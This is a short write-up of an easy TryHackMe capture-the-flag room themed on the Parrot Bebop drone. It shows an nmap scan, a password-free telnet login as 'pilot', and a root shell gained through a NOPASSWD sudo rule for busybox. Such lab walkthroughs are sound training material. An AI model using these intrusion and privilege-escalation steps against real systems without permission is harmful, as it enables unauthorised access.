CTF

bebop | drone lovers CTF

fr33s0ul

Apr 13, 2020 • 3 min read

Hello everyone, Today's CTF is available at www.Tryhackme.com rated as an easy challenge so it won't be hard for someone just starting in the field, the concept is based on the Parrot Bebop drone and brings a huge inspiration of the memory of the DEFCON 23 speech "Knocking my neighbour's kids cruddy drone offline", feel free to give it a check, the talk carries a lot of good information.

Let's start with some enumeration

root@kali:~# nmap -sC -sV 10.10.116.147
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-13 17:15 UTC
Nmap scan report for ip-10-10-116-147.eu-west-1.compute.internal (10.10.116.147)
Host is up (0.00032s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0)
| ssh-hostkey: 
|   2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA)
|   256 d5:4e:18:45:ba:d4:75:2d:55:2f:fe:c9:1c:db:ce:cb (ECDSA)
|_  256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519)
23/tcp open  telnet  BSD-derived telnetd
MAC Address: 02:17:77:E9:CA:4E (Unknown)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.64 seconds
root@kali:~#

Telnet to the machine no credentials needed and the username is provided in the challenge.

root@kali:~# telnet 10.10.116.147
Trying 10.10.116.147...
Connected to 10.10.116.147.
Escape character is '^]'.
login: pilot
Last login: Sat Oct  5 23:48:53 from cpc147224-roth10-2-0-cust456.17-1.cable.virginm.net
FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr  4 02:07:22 UTC 2019

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

Edit /etc/motd to change this login announcement.
You can use "pkg info" to see a list of packages you have installed.
[pilot@freebsd ~]$

The user flag is in the user pilot directory.

[pilot@freebsd ~]$ ls
user.txt
[pilot@freebsd ~]$ cat user.txt 
THM{r3mxxxxxxxxxxxxxxxxx}
[pilot@freebsd ~]$

Privilege escalation

[pilot@freebsd /]$ sudo -l
User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox
[pilot@freebsd /]$ sudo /usr/local/bin/busybox sh
# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
#

And that's it, very quick tasty machine to exploit.

Happy Hacking